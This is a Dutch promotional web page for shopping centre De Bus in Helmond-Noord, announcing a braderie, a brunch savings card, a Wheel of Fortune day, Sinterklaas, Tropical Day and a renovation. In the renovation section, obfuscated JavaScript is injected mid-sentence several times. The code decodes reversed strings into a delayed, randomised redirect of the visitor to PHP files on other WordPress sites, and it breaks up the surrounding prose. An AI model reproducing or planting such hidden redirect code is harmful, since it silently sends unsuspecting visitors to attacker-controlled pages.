Op zondag 23 september organiseert winkelcentrum De Bus een grootse braderie met vele kramen met mooie artikelen. Tevens zullen alle winkels geopend zijn. Voor de kinderen is er veel vertier. Tijdens deze dag speelt er een top band van 13.00-17.00 uur.

Kom brunchen in het winkelcentrum!

Koop bij 5 verschillende winkels tijdens de actieperiode en ontvang één stempel per winkel per aankoop. Heeft u 5 vakjes vol dan kunt u uw spaarkaart inleveren om deel te nemen aan de gezamenlijke brunch zondag 9 september van 12.00-14.00 uur. Sparen kan van maandag 10 juli t/m zaterdag 1 september. Spaarkaarten zijn te verkrijgen bij de deelnemende winkels (zolang de voorraad strekt).

Speel mee met het Rad van Fortuin!

Zaterdag 13 mei staat er een leuke actie op het programma. Speel dan mee met het rad van fortuin. Lever 3 kassabonnen van de deelnemende winkels (gedateerd op zaterdag 13 mei) in bij de showmaster en draai gratis aan het Rad van Fortuin. Je maakt altijd kans op een leuke prijs dus graag tot ziens!

Spaar & Win bij Winkelcentrum de Bus!

Vanaf vandaag Maakt u 4 weken lang elke week kans op een waardecheque van 25, 50 of 100 euro!* Hoe maakt u kans op één van deze prachtige prijzen? Verzamel van 14 november t/m 17 december 2016 al uw kassabonnen van uw aankopen in Winkelcentrum de Bus. Stop voor minimaal € 50,- aan kassabonnen, besteed bij tenminste 3 verschillende winkeliers in de deelname envelop en deponeer deze vervolgens in de daarvoor bestemde actiebrievenbus in het Winkelcentrum. U kunt zo vaak meedoen als uw wilt en maakt 4 weken lang kans op een prijs! De prijsuitreikingen vinden plaats op: zaterdag 26/11 (door Sint), 3/12, 10/12 en 17/12. * Te besteden in Winkelcentrum de Bus bij de deelnemende winkeliers.

Hij komt… hij komt…

Zaterdag 26 november is het weer zover! Sinterklaas en zijn Pieten bezoeken ons winkelcentrum weer! Vanaf 10.30 uur - 12.30 uur is er weer volop gezelligheid voor de kleintjes. Kom op tijd voor de leuke show door Bart & Theo en zing samen voor een warm onthaal van de Sint! De Pieten delen weer volop lekkers uit! Zorg dat jij erbij bent want het gaat weer een gezellige ochtend worden.

Tropical Day!

Op zaterdag 10 september van 09:00 - 17.00 uur sluiten wij de vakantieperiode graag in tropische sferen samen met jullie af. Deze dag staat nog even in het teken van zon, zee en strand. Er zijn leuke kraampjes, ritmische live optredens, gratis versnaperingen en gratis magische ranja voor de kids. Kortom een zonnige dag die je niet mag missen! Er is een muzikaal optreden van Salsaband-agogo-Rincón, deze swingende salsaband zal tussen 13:00 - 16:30 uur op het plein zomerse klanken ten gehore brengen. Waan je weer even op jouw heerlijke vakantiebestemming en kom een dansje wagen! Speciaal voor deze dag zijn de winkeliers weer aanwezig met leuke kraampjes, heerlijke versproducten en aantrekkelijke acties. Voor de kinderen worden er gratis magische ranja’s geschonken! Verder verwennen wij u met verse versnaperingen en is er een heerlijke kiwi proeverij. Kom lekker proeven, shoppen en swingen tijdens de Tropical Day!

Nieuwe website online!

Sinds medio 2016 heeft Winkelcentrum de Bus een vernieuwde wesbsite. Op deze website vindt u een handig overzicht van alle winkels die gevestigd zijn binnen het winkelcentrum. Zo vindt u makkelijk en snel de openingstijden en blijft u altijd op de hoogte van nieuwtjes en activiteiten in en rondom ons winkelcentrum. Wij ontvangen u graag in ons Winkelcentrum voor al uw dagelijkse boodschappen, maar ook voor speciale cadeautjes. Verder kunt u ons ook volgen op onze Facebook pagina om altijd op de hoogte te blijven van acties en onze leuke jaarlijkse activiteiten!

Activiteiten

De ondernemersvereniging van Winkelcentrum de Bus heeft jaarlijks tal van leuke activiteiten in de planning. Zo hebben wij jaarlijks diverse spaar- winacties. Zetten we mama en papa in het zonnetje tijdens Moeder- of Vaderdag. Pakken we tijdens Pasen en Kerst altijd leuk uit en komt Sinterklaas jaarlijks naar ons winkelcentrum om ook de kinderen uit de wijk een leuke ochtend te bieden. Hiermee zijn wij een bindmiddel in de wijk en staan wij centraal voor ontmoeten en gezelligheid. Middels deze website en onze Facebook pagina houden wij u graag op de hoogte van al deze activiteiten.

Nieuw jasje

Eind 2014 is Winkelcentrum de Bus volledig gerenoveerd. Zowel de buiten- als binnenzijde is volledig aangepakt, ook de huisstijl van winkelcentrum de Bus is destijds vernieuwd. Na een intensieve verbouwing is het winkelcentrum weer volledig klaar voor de $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toekomst, zo zijn de vernieuwde entrees voorzien van het nieuwe logo, verlichting en is de gehele vloer vernieuwd. De buitenzijde is geschilderd en voorzien van mooie visuele communicatie. Verder zijn er nieuwe bankjes geplaatst om zo ook voor de ouderen ons winkelcentrum te laten dienen als een ontmoetingsplek. Wij vinden dat de Bus moet dienen als een sociaal kloppend hart binnen de wijk Helmond-Noord. Ook beschikken wij over een gratis WiFi netwerk zodat u ook tijdens het doen van uw dagelijkse boodschappen van alle gemakken bent voorzien. Wij zien mede hierdoor de $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toekomst met vertrouwen tegenmoet, dus namens de ondernemersvereniging graag $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tot ziens in Winkelcentrum de Bus!